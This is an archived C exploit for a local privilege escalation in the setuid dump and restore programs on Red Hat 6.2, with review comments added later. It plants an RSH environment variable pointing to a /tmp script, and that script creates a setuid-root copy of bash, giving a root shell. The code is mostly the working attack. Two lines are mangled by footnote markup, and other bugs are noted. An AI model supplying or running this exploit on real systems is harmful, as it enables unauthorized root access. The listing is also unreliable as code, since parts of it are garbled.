
dump 0.4b15 exploit (Redhat 6.2)


http://www.gipsky.com/
/*

**

** dump-0.4b15x.c

**

** dump-0.4b15 exploit:

** Redhat 6.2 dump command executes

** external program with suid privilege.

**

** affected:

** /sbin/dump

** /sbin/dump.static

** /sbin/restore

** /sbin/restore.static

**

** Bug found by mat@hacksware.com

**

** This example was coded by md0claes@mdstud.chalmers.se

** It was written for EDUCATIONAL PURPOSES ONLY.

**

**

*/



#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <errno.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <fcntl.h>



#define RUNME "/tmp/runme" /* tmp file */

#define SUID_PATH "/tmp/superdude" /* the power of root */



/* Print the command-line synopsis to stdout.
 * pname is printed verbatim as the program name (callers pass argv[0]). */
void usage(char *pname)
{
    static const char *const option_lines[] = {
        " d - exploit /sbin/dump\n",
        " s - exploit /sbin/dump.static\n",
        " r - exploit /sbin/restore\n",
        " p - exploit /sbin/restore.static\n\n",
    };
    size_t i;

    printf("\nUsage: %s < d | s | r | p >\n\n", pname);
    for (i = 0; i < sizeof option_lines / sizeof option_lines[0]; i++) {
        fputs(option_lines[i], stdout);
    }
}



/*
 * Entry point.  argv[1] selects one of the four setuid binaries listed in
 * usage(); the selected binary is started in a child with a crafted
 * environment, and after a fixed delay the parent execs SUID_PATH.
 *
 * Root cause, as the file header describes it: a setuid program takes the
 * name of an external program to run from its environment (RSH here) and
 * executes it with its elevated privilege.  The defensive fix is for setuid
 * programs to ignore or sanitise such environment variables.
 *
 * NOTE(review): as printed on this page the function does not compile.  Two
 * lines (the open() and fork() calls) were mangled by the archive's footnote
 * markup into "if [1] ..." and "if [2] ..."; the original expressions are
 * reproduced in footnotes 1 and 2 at the end of the page.
 * NOTE(review): tolower() is called without including <ctype.h>; that is an
 * implicit declaration, which C99 and later reject.
 */
int main(int argc, char *argv[], char *envp[])
{
    int fd;      /* descriptor for the RUNME script */
    pid_t pid;   /* child that runs the selected binary */

    /* Environment handed to the child.  NOTE(review): execle() requires the
     * envp array to be terminated by a NULL entry, which this initializer
     * lacks; execle() will read past the end of the array. */
    char *bad_env[] = { "TAPE=garbage:garbage", "RSH="RUNME };

    /* Script body written to RUNME.  runbuf is a char array initialised from
     * a string literal, so sizeof(runbuf) counts the trailing NUL and the
     * write() below emits that byte too. */
    char runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash "
    SUID_PATH "\nchmod 6755 " SUID_PATH };

    /* argv for the final execve() of SUID_PATH. */
    char *suid[] = { SUID_PATH, NULL };

    /* argv for the child; defaults to restore.static and is overwritten in
     * the switch below for the other options. */
    char *av[] = { "/sbin/restore.static", "restore.static",
    "-t", "/tmp/foo" };

    if (argc != 2) {
        usage(argv[0]);
        exit(1);
    }

    /* Only the first character of the option is examined, case-insensitively. */
    switch(tolower(argv[1][0])) {

    case 'd':
        av[0] = "/sbin/dump";
        av[1] = "dump";
        av[2] = "-0";
        av[3] = "/";
        break;

    case 's':
        av[0] = "/sbin/dump.static";
        av[1] = "dump.static";
        av[2] = "-0";
        av[3] = "/";
        break;

    case 'r':
        av[0] = "/sbin/restore";
        av[1] = "restore";
        break;

    case 'p':
        /* Defaults in av[] already select restore.static. */
        break;

    default:
        usage(argv[0]);
        exit(1);
    }

    /* NOTE(review): mangled in the archive; footnote 1 gives the original
     * open() call.  The perror() label says "fopen" although, per the
     * footnote, the call is open(). */
    if [1] == -1) {
        perror("fopen");
        exit(1);
    }

    /* Return value checked only for -1; a short write is not detected. */
    if (write(fd, runbuf, sizeof(runbuf)) == -1) {
        perror("write");
        exit(1);
    }
    close(fd);   /* return value unchecked */

    /* NOTE(review): mangled in the archive; footnote 2 gives the original
     * fork() call. */
    if [2] < 0) {
        perror("fork");
        exit(1);
    }

    else if (pid == 0) {
        /* Child: run the selected binary with the crafted environment.
         * execle() only returns on failure. */
        if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) {
            perror("execle");
            _exit(1);
        }
    }

    /* Parent: waits a fixed second rather than calling waitpid(), so the
     * messages below are printed whether or not the child succeeded. */
    sleep(1);
    unlink(RUNME);   /* return value unchecked */
    fprintf(stdout, "\nExploited %s \n", av[0]);
    fprintf(stdout, "Running " SUID_PATH "\n");
    /* Return value unchecked: if execve() fails, execution falls through to
     * exit(0) and the failure is not reported. */
    execve(SUID_PATH, suid, envp);

    exit(0);
}

[2000-11-29]
附注
  1. fd = open(RUNME,O_WRONLY|O_CREAT|O_TRUNC, 0755
  2. pid = fork(